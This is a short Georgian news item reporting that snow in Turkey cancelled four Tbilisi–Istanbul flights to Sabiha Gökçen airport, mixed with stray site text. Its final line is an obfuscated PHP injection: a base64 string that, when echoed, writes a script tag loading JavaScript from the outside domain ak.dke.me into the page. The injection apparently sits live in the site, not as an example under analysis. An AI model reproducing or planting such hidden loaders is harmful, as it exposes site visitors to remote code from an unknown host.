celsiusi
ავერსი საქკაბელი
თურქეთში თოვლისა და უამინდობის გამო, წუხელ თბილისიდან სტამბოლის „საბიჰა გოგჩენის“ აეროპორტის მიმართულებით ოთხი რეისი გაუქმდა.
როგორც თბილისის საერთაშორისო აეროპორტში აცხადებენ, „პეგასუსის ავიახაზების“ და „თურქეთის ავიახაზების“ ავიარეისები სტამბოლის „საბიჰა გოგჩენის“ აეროპორტში მოსული თოვლის გამო თბილისში ვერ გამოფრინდა, რის გამოც თბილისიდან სტამბოლისკენ დაგეგმილი რეისებიც გაუქმდა.
აეროპორტის მონაცემებით, სტამბოლის მიმართულებით დღეს დაგეგმილი რეისები განრიგის შესაბამისად შესრულდება.
ამ დროისთვის მიმდინარეობს მგზავრების რეგისტრაცია „თურქეთის ავიახაზების“ რეისზე #TK 379, რომელიც აეროპორტ „სტამბოლის“ მიმართულებით 12:20 საათზე გაფრინდება. 
317
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");